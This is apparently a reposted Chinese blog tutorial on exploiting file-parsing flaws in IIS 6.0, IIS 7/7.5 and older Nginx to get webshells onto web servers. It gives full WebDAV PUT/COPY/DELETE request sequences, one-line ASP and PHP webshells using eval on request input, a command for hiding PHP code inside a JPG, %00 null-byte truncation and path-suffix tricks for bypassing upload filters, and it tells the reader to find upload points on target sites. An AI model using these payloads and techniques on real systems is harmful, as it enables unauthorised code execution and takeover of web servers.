关于解析漏洞

IIS6.0 解析漏洞

1.在网站目录中如果存在名为*.asp、*asa的目录,那么该目录下内的任何文件都会被解析成asp文件被执行。

2.再上传图片木马的时候,将文件名改为*.asp;,jpg,该文件文件都会被IIS解析为asp文件执行。

3.还有IIS6.0 默认的可执行文件除了asp还包含这三种/wooyun.cer、/wooyun.asa、/wooyun.cdx

4.(转载)WebDav漏洞(对IIS写权限的利用,这个我们在之前学http请求的时候就说过的请求头和正文语句,这段好好看)

  • 第一步,通过OPTIONS探测服务器所支持的HTTP方法

请求:

OPTIONS / HTTP/1.1

Host:www.example.com

响应:

Public:OPTIONS,TRACE,GET,HEAD,DELETE,PUT,POST,COPY,MOVE,MKCOL,PROPFIND,PROPPATCH,LOCK,UNLOCK,SEARCH

  • 第二步,通过PUT方法向服务器上传脚本文件

请求:

PUT /a.txt HTTP/1.1

Host:www.example.com

Content-Length:30

<%eval request("chopper")%>

第三步,通过Move或Copy方法改名

请求:

COPY /a.txt HTTP/1.1

Host:www.example.com

Destination:http://www.example.com/cmd.asp

第四步,使用DELETE方法,攻击者还可以删除服务器上的任意文件

请求:

DELETE /a.txt HTTP/1.1

Host:www.example.com

5.当你上传的木马如asp/aspx,必须在IIS6.0环境,且在以x.asp为名称的文件夹下面,才能执行图片里的代码,也就是说,图片木马执行必须满足2个条件:A:有x.asp文件夹;B:图片木马在x.asp文件夹下,那么怎么去达到这种目的就需要奇艺技巧了,常见的是通过%00截断和一些个更改上传时候的属性。(下面会讲到)

------------------------------------------------------------------------------------------------------------------------------------------------------------------------

图片木马制作方法

使用CMD制作一句话木马。

参数/b指定以二进制格式复制、合并文件; 用于图像类/声音类文件

参数/a指定以ASCII格式复制、合并文件。用于txt等文档类文件

copy 1.jpg/b+1.php 2.jpg

//意思是将1.jpg以二进制与1.php合并成2.jpg

那么2.jpg就是图片木马了。

--------------------------------------------------------------------------------------------------

查看数据包,其中Content-Disposition:form-data;name=”path”下面的一行为服务保存文件的相对路径,我们把原本的 uploadimg/ 改为 uploadimg/1.php;

---------------------------------------------------------------------------------------------------

截断上传,是借助%00截断上传使%00后面的字串被忽略,如:1.asp.jpg=1.asp%00.jpg,从而成功上传shell。

---------------------------------------------------------------------------------------------------

二、IIS7.0/IIS 7.5/ Nginx <8.03畸形解析漏洞

找到使用IIS7.0架设的站,然后找到其中的图片上传点(不需要管理权限,普通注册用户即可搞定),把PHP大马后缀改成.jpg,传上去,得到图片地址。

在图片格式后面添加xx.jpg/. php随便你怎么填。只要后缀为.php就好。如(http://192.168.1.1/upload/1.jpg/.php)

<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>然后访问sp.jpg/.php,在这个目录下就会生成一句话木马 shell.php
原文地址:https://www.cnblogs.com/52xuege/p/9460381.html